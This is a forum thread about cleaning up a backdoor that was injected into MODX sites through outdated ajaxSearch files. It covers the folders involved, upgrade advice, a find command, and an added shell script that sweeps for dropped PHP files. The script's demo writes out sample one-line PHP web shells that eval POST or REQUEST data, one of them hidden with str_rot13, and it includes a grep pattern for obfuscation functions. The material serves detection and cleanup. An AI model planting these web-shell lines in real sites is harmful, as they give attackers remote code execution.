  • I have just obtained the script used for injection, if you have been infected please check the following folders for backdoor files.

    'assets/media/',
    'assets/flash/',
    'assets/docs/',
    'assets/modules/docmanager/',
    'assets/snippets/ajaxSearch/'

    The remote script chooses one of the folders above at random to drop the backdoor; it also touches this file:

    manager/includes/protect.inc.php

    From what I have checked, it is also not affecting the file date/time stamp.

    Thanks Aaron
      http://www.onesmarthost.co.uk
      UK MODX Hosting with love.
      Great find, Onesmarthost, just what we needed.

      found /www/assets/docs/faq_f.php

      with some unpacking code.

      I've removed the ajaxSearch snippet altogether, although I was under the assumption I had always been up to date; must have been a remnant file.

      • No problem, I’m currently going to be advising my customers to remove index-ajax.php and /assets/snippets/ajaxSearch if they are not using it.

        I suspect in the past users are uploading new MODx installs but these files are just being left behind (I could be wrong).

        Aaron
          http://www.onesmarthost.co.uk
          UK MODX Hosting with love.
          Quote from: Onesmarthost at Aug 18, 2010, 08:33 AM

          No problem, I’m currently going to be advising my customers to remove index-ajax.php and /assets/snippets/ajaxSearch if they are not using it.

          I suspect in the past users are uploading new MODx installs but these files are just being left behind (I could be wrong).

          Aaron

          I think you're spot on.

          Good point with index-ajax.php.

          My cxs logs did indicate some POST calls being made to some index file, which could explain index-ajax.php.
            Thanks, Aaron, your discovery is quite helpful but the fix is incomplete. Many of us use ajaxsearch in our websites. Removing it is only a stopgap. I’m hoping to see a fix PDQ.
            • Hi Puffin,

              Sorry, I should have mentioned this more clearly.

              Basically, earlier versions of ajax-search had an exploit which was patched in later versions of MODx; however, some of the old ajax-search files were called

              (1) ajax-search.php, ajax.php (old versions)

              The new versions of Ajax-Search had different file names, so basically when users upgraded MODx these (1) files never got removed.

              If anyone uses Ajax-Search, just delete your existing assets/snippets/ajaxsearch folder, then download the latest ajaxsearch 1.90:

              http://modxcms.com/extras/package/?package=8

              And install this, as it's fully patched and comes with the latest version of MODx. Deleting the old folder first just ensures you are not carrying across any of the old files into your new install.

              Aaron

                http://www.onesmarthost.co.uk
                UK MODX Hosting with love.
                Got it and thanks for explaining.
                  If you have SSH access, you can use:

                  find . -name "*_[a-z].php"


                  to find the file that gets placed in your assets folder. This find command will find files that look like help_y.php or middle_h.php. Just run this command from the web root and it will find it (and anything else that might match).

                  James
                  • The files I've seen contained _1 to 9.

                    I think the files the exploit drops are dependent on the hacker, as they most likely just change the random file name range.
                      http://www.onesmarthost.co.uk
                      UK MODX Hosting with love.
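James's find pattern catches letter suffixes and Aaron reports digit suffixes, which shows the name is whatever the attacker picked that week. The following added example (not code from the thread or from MODx) widens the name test to `*_[a-z0-9].php` and pairs it with a content check for the constructs packed droppers rely on, so a renamed copy still surfaces. The marker list, the three-way classification and the constructed tree in demo() are assumptions for illustration.

```shell
#!/bin/sh
# Added example, not from the thread or from MODx: sweep a web root for the
# dropped backdoor. Combines the file-name heuristic from the thread (James's
# *_[a-z].php, widened to digits as Aaron reported) with a content check, since
# the attacker controls the name pattern. MARKERS and the tree in demo() are
# illustrative assumptions.

# PHP constructs typical of packed droppers. Any one of them is a reason to open
# the file, not proof of compromise.
MARKERS='(eval|assert|base64_decode|gzinflate|gzuncompress|str_rot13) *\('

# sweep ROOT: one line per suspicious *.php under ROOT, in find/sort order.
#   NAME+CONTENT <path>  dropper-style name and obfuscation markers
#   NAME <path>          name matches only; review by hand, may be legitimate
#   CONTENT <path>       markers present under a name the pattern would miss
sweep() {
    ( cd "$1" || exit 1
      find . -type f -name '*.php' | sort |
      while IFS= read -r f; do
          f=${f#./}
          name=0; content=0
          case "${f##*/}" in *_[a-z0-9].php) name=1 ;; esac
          if grep -Eq "$MARKERS" "$f"; then content=1; fi
          if [ $name = 1 ] && [ $content = 1 ]; then echo "NAME+CONTENT $f"
          elif [ $name = 1 ]; then echo "NAME $f"
          elif [ $content = 1 ]; then echo "CONTENT $f"
          fi
      done )
}

# demo: constructed tree with legitimate files, two dropped files in the shape
# the thread describes, and the same payload under a name the pattern misses.
demo() {
    root=$(mktemp -d)
    mkdir -p "$root/assets/docs" "$root/assets/media" "$root/assets/flash" "$root/assets/snippets/ajaxSearch"
    # legitimate files (constructed stand-ins); form_v.php shows a name-only false positive
    printf '<?php // ajaxSearch 1.9 snippet\n' > "$root/assets/snippets/ajaxSearch/ajaxSearch.php"
    printf '<?php // contact form handler\n'   > "$root/assets/snippets/form_v.php"
    # dropped files with a letter and a digit suffix
    printf '<?php eval(gzinflate(base64_decode($_POST["p"])));\n' > "$root/assets/docs/faq_f.php"
    printf '<?php eval(base64_decode($_REQUEST["c"]));\n'         > "$root/assets/media/help_3.php"
    # same payload under a name the find pattern misses
    printf '<?php $f=str_rot13("riny"); $f(base64_decode($_POST["x"]));\n' > "$root/assets/flash/loader.php"
    sweep "$root"
    rm -rf "$root"
}
```

Run `sweep /var/www/site` from an SSH session. NAME+CONTENT hits are the dropped files; CONTENT hits are where the same payload went under a name the thread's pattern would not match; NAME-only hits need a quick look before deleting, since a legitimate snippet can match the pattern too.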
                      This one hit me as well. I found the eval code in document.parser.class.inc but hadn't found the others. Thanks, guys.
                        Chuck the Trukk
                        ProWebscape.com :: Nashville-WebDesign.com
                        - - - - - - - -
                        What are TV's? Here's some info below.
                        http://modxcms.com/forums/index.php/topic,21081.msg159009.html#msg1590091
                        http://modxcms.com/forums/index.php/topic,14957.msg97008.html#msg97008